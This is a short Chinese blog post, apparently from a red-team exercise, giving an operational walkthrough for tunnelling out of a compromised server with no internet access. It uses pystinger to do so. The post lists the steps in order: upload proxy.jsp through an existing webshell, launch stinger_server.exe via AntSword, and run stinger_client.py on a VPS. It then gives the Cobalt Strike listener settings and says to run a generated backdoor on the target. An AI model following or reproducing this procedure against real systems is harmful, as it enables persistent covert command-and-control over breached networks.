文章讲述了在目标服务器不出网的情况下,如何通过pystinger工具进行内网穿透。首先,将proxy.jsp上传至目标服务器并确保可访问,然后使用AntSword启动stinger_server.exe。在互联网端,通过python3运行stinger_client.py建立连接。最后,配置CS监听器以实现C2通信,创建并运行后门。
某hw过程中遇到如下情况:
获取到webshell,目标服务器不出网
目标机:内网地址,端口映射到公网ip
vps:
pystinger地址:
https://github.com/FunnyWolf/pystinger
python3 -m pip install -r requirement.txt
目标机操作:
1、proxy.jsp上传到目标服务器,确保http://example.com:8080/proxy.jsp可以访问
,页面返回UTF-8
2、stinger_server.exe上传到目标服务器,
AntSword运行cmdstart D:/XXX/stinger_server.exe启动pystinger-server
不要D:/xxx/singer_server.exe直接运行,会造成TCP断开
互联网微PS操作:
3、python3 ./stinger_client.py -w
http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
CS监听器配置
HTTP Hosts:127.0.0.1
HTTP Hosts(stager):目标及内网ip
HTTP Port(C2):60020
s生成后门在目标机运行
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
